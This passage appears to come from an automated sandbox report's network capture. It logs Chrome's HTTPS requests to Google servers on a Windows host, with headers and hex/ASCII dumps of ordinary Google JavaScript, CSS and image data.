2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 37 37 32 31 35 29 2b 63 2a 36 37 37 37 32 31 36 2b 62 2a 36 37 31 30 36 35 36 2c 63 2b 3d 62 2a 38 31 34 37 34 39 37 2c 62 2a 3d 32 2c 61 3e 3d 31 45 37 26 26 28 63 2b 3d 61 2f 31 45 37 3e 3e 3e 30 2c 61 25 3d 31 45 37 29 2c 63 3e 3d 31 45 37 26 26 28 62 2b 3d 63 2f 31 45 37 3e 3e 3e 30 2c 63 25 3d 31 45 37 29 2c 63 3d 62 2b 68 63 28 63 29 2b 68 63 28 61 29 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 68 63 28 61 29 7b 61 3d 53 74 72 69 6e 67 28 61 29 3b 72 65 74 75 72 6e 22 30 30 30 30 30 30 30 22 2e 73 6c 69 63 65 28 61 2e 6c 65 6e 67 74 68 29 2b 61 7d 0a 66 75 6e 63 74 69 6f 6e 20 69 63 28 61 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3c 31 36 29 64 63 28 4e 75 6d 62 65 72 28 61 29 29 3b 65 6c 73 65 20 69 66 28 6e 62 28 29 29 61 3d 42 69 67 Data Ascii: 77215)+c6777216+b6710656,c+=b8147497,b=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+hc(c)+hc(a));return c}function hc(a){a=String(a);return"0000000".slice(a.length)+a}function ic(a){if(a.length<16)dc(Number(a));else if(nb())a=Big
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 24 2f 2e 74 65 73 74 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 7d 65 6c 73 65 20 69 66 28 50 62 28 62 29 26 26 21 4e 75 6d 62 65 72 2e 69 73 53 61 66 65 49 6e 74 65 67 65 72 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 53 62 3f 61 3d 42 69 67 49 6e 74 28 61 29 3a 61 3d 52 62 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 51 62 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 3b 72 65 74 75 72 6e 20 61 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 72 63 28 61 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 72 63 28 61 29 7b 61 3d 4d 61 74 68 2e 74 72 75 6e 63 28 61 29 3b 4e 75 6d 62 65 72 2e 69 73 53 61 66 65 49 6e 74 65 67 65 72 28 61 29 7c 7c 28 64 63 28 61 29 Data Ascii: $/.test(b))throw Error(String(b));}else if(Pb(b)&&!Number.isSafeInteger(b))throw Error(String(b));Sb?a=BigInt(a):a=Rb(a)?a?"1":"0":Qb(a)?a.trim()\|\|"0":String(a);return a;default:return rc(a)}}function rc(a){a=Math.trunc(a);Number.isSafeInteger(a)\|\|(dc(a)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.16	49737	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:27 UTC	1054	OUT	GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ogs.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 2091 Date: Thu, 26 Sep 2024 15:55:27 GMT Expires: Thu, 26 Sep 2024 15:55:27 GMT Cache-Control: private, max-age=31536000 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:27 UTC	719	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 07 f2 49 44 41 54 78 01 c5 9a 03 f0 ec ea 12 c4 9f 6d a3 74 6d db 38 36 af 6d db b6 6d 9b 87 d7 b6 6d db 58 6f b0 f8 b3 5f 7e b5 e7 4d 6d e5 26 df e6 78 ab ba b2 15 76 cf f4 cc f7 05 3f 9a 13 bf 20 08 7e 5e a9 54 56 2e 97 cb fb 7a 9e 77 4b 84 97 ab d5 aa 1f 2d eb 60 c6 ff 77 a3 e5 1d 11 8e 8f f6 1b e0 fb fe 1f 7f 34 bf 7f 11 89 e5 22 1c 13 91 7a 36 5a e6 22 92 8a 96 a9 60 3b 40 d0 0c 91 e7 21 86 00 cc 53 e2 51 b4 c7 45 04 ee 8b d0 4c 24 eb 10 60 30 31 9e 10 53 28 14 76 8a c4 fc 76 6e 13 5f 19 e2 ee 48 bb 05 b8 10 9d ff cd 48 c4 66 73 9c 38 29 c6 2a f8 d9 08 cd 71 01 96 11 84 5c 1f ed ff f7 39 42 3e f2 e9 7f 29 3e 23 32 17 05 c4 b3 41 8d cd 16 f9 7a bd Data Ascii: PNGIHDR00WIDATxmtm86mmmXo_~Mm&xv? ~^TV.zwK-`w4"z6Z"`;@!SQEL$`01S(vvn_HHfs8)*q\9B>)>#2Az
2024-09-26 15:55:27 UTC	1372	IN	Data Raw: eb dc e4 dd b8 cf fa 3e f3 f9 b4 e8 43 a8 eb e5 a1 0a 8e 5e 50 b9 01 43 db db 25 91 87 3c 84 20 36 e3 18 cf 39 07 82 2c e7 24 30 78 de 4d de 3d cd 60 5c f8 ff 4d 49 2e 91 7c d8 a3 b0 f0 8a fa 1e ff b5 fa 5e fe 83 ea 57 2d 22 88 e7 87 0c 40 04 85 4a fb b3 1e 9e 92 c5 b9 06 ee 4b 98 6d ee 91 1c fd 68 a7 ba d4 78 ef 48 f5 3e f4 63 f5 3e f1 77 21 a2 eb 9e ff aa b4 c5 3a 58 8a 62 25 92 76 cc bc 16 c0 ed 29 93 b6 5b 52 09 84 2d fb f4 3e f2 2b 21 a0 e7 b1 3f ab f7 b9 3f 8a ff 95 9d 16 51 e5 91 47 3a 46 bf a7 e1 a9 b7 6b d6 d0 ac 41 d2 29 60 2a 02 5e 4e 24 1f d4 e5 7b 39 f5 3c bb 50 44 fc 8f 90 37 60 29 d6 33 eb 64 bf d4 0c 06 9e 8e 9d 12 68 af 6b 03 ed 7b 5d 26 d8 be 3b 5e 1e 68 ca 73 3e 42 52 45 50 bb 58 c8 4f 8b 7e 50 7c 5b 10 8e 0b c0 52 5d af 6d 2c bf a1 b4 Data Ascii: >C^PC%< 69,$0xM=`\MI.\|^W-"@JKmhxH>c>w!:Xb%v)[R->+!??QG:FkA)`*^N${9<PD7`)3dhk{]&;^hs>BREPXO~P\|[R]m,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.16	49742	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:27 UTC	3522	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sy [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:28 UTC	818	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 507559 Date: Thu, 26 Sep 2024 15:55:28 GMT Expires: Fri, 26 Sep 2025 15:55:28 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:28 UTC	572	IN	Data Raw: 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 22 63 2d 77 69 7a 7b 63 6f 6e 74 61 69 6e 3a 73 74 79 6c 65 7d 63 2d 77 69 7a 3e 63 2d 64 61 74 61 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 72 45 54 53 44 7b 63 6f 6e 74 61 69 6e 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 55 62 69 38 5a 7b 63 6f 6e 74 61 69 6e 3a 6c 61 79 6f 75 74 20 73 74 79 6c 65 7d 2e 6a 62 42 49 74 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 44 55 30 4e 4a 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 6c 50 33 4a 6f 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c Data Ascii: _F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:rel
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 68 2c 71 6c 69 2d 62 6c 75 65 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 49 45 71 69 41 66 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 66 69 6c 6c 2d 75 6e 66 69 6c 6c 2d 72 6f 74 61 74 65 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 2c 71 6c 69 2d 72 65 64 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 73 6d 6f 63 73 65 7b 61 6e 69 6d 61 74 Data Ascii: h,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animat
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 61 63 69 74 79 3a 30 2e 39 39 7d 39 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 62 65 44 51 50 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 35 30 25 7d 2e 46 63 58 66 69 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 34 35 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 25 7d 2e 53 50 4b 46 6d 63 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 Data Ascii: acity:0.99}90%{opacity:0.99}100%{opacity:0}}.beDQP{display:inline-block;height:100%;overflow:hidden;position:relative;width:50%}.FcXfi{box-sizing:border-box;height:100%;left:45%;overflow:hidden;position:absolute;top:0;width:10%}.SPKFmc{border-radius:50%;b
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 20 2e 74 53 33 50 35 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 45 70 46 4e 57 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 6c 65 66 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 Data Ascii: .tS3P5{border-color:var(--EpFNW);border-bottom-color:transparent}@keyframes qli-left-spin{0%{transform:rotate(130deg)}50%{transform:rotate(-5deg)}100%{transform:rotate(130deg)}}@keyframes qli-right-spin{0%{transform:rotate(-130deg)}50%{transform:rotate(5
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 30 25 7d 2e 5a 65 56 42 74 63 7b 63 6f 6c 6f 72 3a 72 67 62 28 39 35 2c 39 39 2c 31 30 34 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 5c 22 2c 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 61 6c 54 42 51 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 32 2c 32 33 32 2c 32 33 30 29 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 6a 75 73 74 69 66 79 Data Ascii: 0%}.ZeVBtc{color:rgb(95,99,104);font-family:\"Google Sans\",Roboto,Arial,sans-serif;font-size:16px;line-height:25px;max-width:300px}.alTBQe{align-items:center;background-color:rgb(252,232,230);border-top-left-radius:8px;border-top-right-radius:8px;justify
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 7d 2e 50 58 54 36 63 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 34 70 78 7d 2e 63 42 39 4d 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 36 30 2c 36 34 2c 36 37 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 36 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 Data Ascii: ,sans-serif;font-size:14px;margin-left:20px;margin-right:20px}.PXT6cd{display:flex;margin-top:14px}.cB9M7{background-color:#fff;border:1px solid rgb(218,220,224);color:rgb(60,64,67);border-radius:36px;display:inline-flex;flex-grow:1;font-size:14px;font-fa
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 79 7b 0a 5f 2e 77 28 22 61 61 22 29 3b 0a 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 62 64 22 29 3b 0a 76 61 72 20 6e 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 32 31 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 64 25 34 21 3d 33 26 26 28 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 61 5b 64 5d 5e 63 29 2c 63 2b 2b 29 3b 72 65 74 75 72 6e 20 62 7d 2c 6f 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 2c 63 3b 66 6f 72 28 63 20 69 6e 20 61 29 69 66 28 61 5b 63 5d 2e 65 29 69 66 28 61 5b 63 5d 2e 62 29 62 2b 2b 3b 65 6c 73 65 20 72 65 74 75 72 6e 21 Data Ascii: y{_.w("aa");_.y();}catch(e){_._DumpException(e)}try{_.w("abd");var ngi=function(a){for(var b="",c=21,d=0;d<a.length;d++)d%4!=3&&(b+=String.fromCharCode(a[d]^c),c++);return b},ogi=function(a){var b=0,c;for(c in a)if(a[c].e)if(a[c].b)b++;else return!
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 43 6c 69 65 6e 74 2d 50 63 74 78 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 71 66 49 30 5a 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 65 61 72 63 68 2d 43 69 2d 46 69 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 41 55 66 37 71 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 69 6c 6b 2d 43 61 70 61 62 69 6c 69 74 69 65 73 22 2c 5f 2e 51 6b 28 62 29 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 4b 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 22 7d 3b 5f 2e 7a 4b 62 3d 21 31 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f Data Ascii: );b.Kb()&&a.set("X-Client-Pctx",_.Qk(b));b=_.Lc("qfI0Zc");b.Kb()&&a.set("X-Search-Ci-Fi",_.Qk(b));b=_.Lc("AUf7qc");b.Kb()&&a.set("X-Silk-Capabilities",_.Qk(b));return a};}catch(e){_._DumpException(e)}try{_.yKb=function(){return""};_.zKb=!1;}catch(e){_
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 4d 61 70 3a 65 2e 63 6f 6e 74 65 78 74 3b 76 61 72 20 6b 3d 65 2e 7a 66 3d 3d 3d 76 6f 69 64 20 30 3f 6e 65 77 20 4d 61 70 3a 65 2e 7a 66 3b 76 61 72 20 6c 3d 65 2e 61 47 3b 76 61 72 20 70 3d 65 2e 56 6e 62 3b 76 61 72 20 72 3d 65 2e 72 37 3b 76 61 72 20 74 3d 65 2e 68 4a 3b 76 61 72 20 78 3d 65 2e 4c 64 63 3b 65 3d 65 2e 71 24 61 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 67 3b 68 3d 6e 65 77 20 4d 61 70 28 5b 5d 2e 63 6f 6e 63 61 74 28 5f 2e 6c 64 28 68 29 29 29 3b 68 2e 68 61 73 28 22 5f 66 6d 74 22 29 7c 7c 68 2e 73 65 74 28 22 5f 66 6d 74 22 2c 22 70 72 6f 67 22 29 3b 66 26 26 68 2e 73 65 74 28 22 5f 69 64 22 2c 66 29 3b 28 66 3d 61 2e 66 79 61 29 26 26 68 2e 73 65 74 28 22 5f 78 73 72 66 22 2c 66 29 3b 6b 3d 6e 65 77 20 4d 61 70 28 6b 29 3b Data Ascii: Map:e.context;var k=e.zf===void 0?new Map:e.zf;var l=e.aG;var p=e.Vnb;var r=e.r7;var t=e.hJ;var x=e.Ldc;e=e.q$a;g=g===void 0?!1:g;h=new Map([].concat(_.ld(h)));h.has("_fmt")\|\|h.set("_fmt","prog");f&&h.set("_id",f);(f=a.fya)&&h.set("_xsrf",f);k=new Map(k);
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 29 26 26 78 2e 73 65 74 28 22 76 65 74 22 2c 64 29 29 3b 66 3f 28 78 2e 73 65 74 28 22 76 65 64 22 2c 66 29 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 26 26 78 2e 73 65 74 28 22 62 6c 22 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 29 2c 67 6f 6f 67 6c 65 2e 73 6e 26 26 78 2e 73 65 74 28 22 73 22 2c 67 6f 6f 67 6c 65 2e 73 6e 29 29 3a 78 2e 73 65 74 28 22 65 69 22 2c 65 7c 7c 28 30 2c 5f 2e 56 6b 2e 76 7a 29 28 29 29 3b 67 26 26 78 2e 73 65 74 28 22 6c 65 69 22 2c 67 29 3b 5f 2e 4a 6a 61 28 78 2c 21 31 2c 21 30 29 3b 67 6f 6f 67 6c 65 2e 75 64 6d 26 26 78 2e 73 65 74 28 22 75 64 6d 22 2c 67 6f 6f 67 6c 65 2e 75 64 6d 29 3b 5f 2e 49 71 62 28 78 29 3b 78 2e 73 65 74 28 22 79 76 22 2c 22 33 22 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 7a 2c 42 29 7b 78 2e 73 Data Ascii: )&&x.set("vet",d));f?(x.set("ved",f),google.kBL&&x.set("bl",google.kBL),google.sn&&x.set("s",google.sn)):x.set("ei",e\|\|(0,_.Vk.vz)());g&&x.set("lei",g);_.Jja(x,!1,!0);google.udm&&x.set("udm",google.udm);_.Iqb(x);x.set("yv","3");b.forEach(function(z,B){x.s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.16	49745	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
